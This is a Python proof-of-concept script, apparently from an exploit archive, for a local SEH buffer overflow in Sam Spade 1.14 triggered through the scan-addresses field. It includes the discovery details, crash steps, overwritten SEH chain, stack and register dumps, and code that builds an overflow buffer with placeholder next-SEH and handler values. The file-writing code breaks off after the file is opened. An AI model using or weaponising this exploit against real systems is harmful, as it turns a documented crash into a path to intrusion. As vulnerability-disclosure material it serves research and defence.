#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : Sam Spade 1.14 Scan from IP address Field SEH Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 20/10/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Crash Point : Go to Tools > Scan addresses field > Enter the contents of 'samspade_1.14_BoF.txt' > OK
# After the execution of POC, the SEH chain looks like this:
# 0012EBE0 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#0012EBD0 41414141AAAA
#0012EBD4 41414141AAAA
#0012EBD8 41414141AAAA
#0012EBDC 41414141AAAA
#0012EBE0 42424242BBBBPointer to next SEH record
#0012EBE4 43434343CCCCSE handler
# And the Registers
#EAX 00000001
#ECX 00000001
#EDX 00140608
#EBX 00000000
#EBP 41414141
#ESI 00C2BD00
#EDI 00E89DB0
#EIP 41414141
buffer = "\x41" * 531
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("samspade_1.14_BoF.txt", "w")